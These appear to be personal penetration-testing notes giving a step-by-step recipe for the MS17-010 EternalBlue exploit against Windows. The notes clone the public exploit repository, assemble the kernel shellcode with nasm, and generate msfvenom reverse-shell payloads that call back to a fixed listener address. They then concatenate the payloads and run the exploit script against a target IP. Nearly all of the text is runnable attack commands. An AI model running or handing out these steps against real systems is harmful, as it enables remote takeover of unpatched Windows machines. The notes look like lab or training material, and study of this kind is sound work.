Backlink: reference-notes-readme
Source Code
Git Source: GitHub - worawit/MS17-010: MS17-010
Initial Preparation
First, clone the git repo.
git clone https://github.com/worawit/MS17-010.git
Next, move into the cloned repo, create a python venv, and install the python2 impacket module.
cd MS17-010
python3 -m venv venv
source venv/bin/activate
python2 -m pip install impacket
The first step to prepare the exploit itself is to assemble the kernel shellcode into binary using nasm. This is done twice, once for each architecture type.
nasm -f bin shellcode/eternalblue_kshellcode_x64.asm -o shellcode/sc_x64_kernel.bin
nasm -f bin shellcode/eternalblue_kshellcode_x86.asm -o shellcode/sc_x86_kernel.bin
Target Specific Preparation
In order to finish preparing the exploit, the following steps must be taken for each target.
First, you need to generate an architecture-specific reverse shell payload with msfvenom.
x64:
msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.49.160 --platform windows -a x64 --format raw -o /var/tmp/sc_x64_payload.bin
x86:
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.49.160 --platform windows -a x86 --format raw -o /var/tmp/sc_x86_payload.bin
Then the kernel shellcode and the reverse shell payload need to be concatenated into a single file.
x64:
cat shellcode/sc_x64_kernel.bin /var/tmp/sc_x64_payload.bin > /var/tmp/sc_x64.bin
x86:
cat shellcode/sc_x86_kernel.bin /var/tmp/sc_x86_payload.bin > /var/tmp/sc_x86.bin
Finally, the appropriate exploit file can be executed.
python2 eternalblue_exploit7.py 192.168.160.43 /var/tmp/sc_x86.bin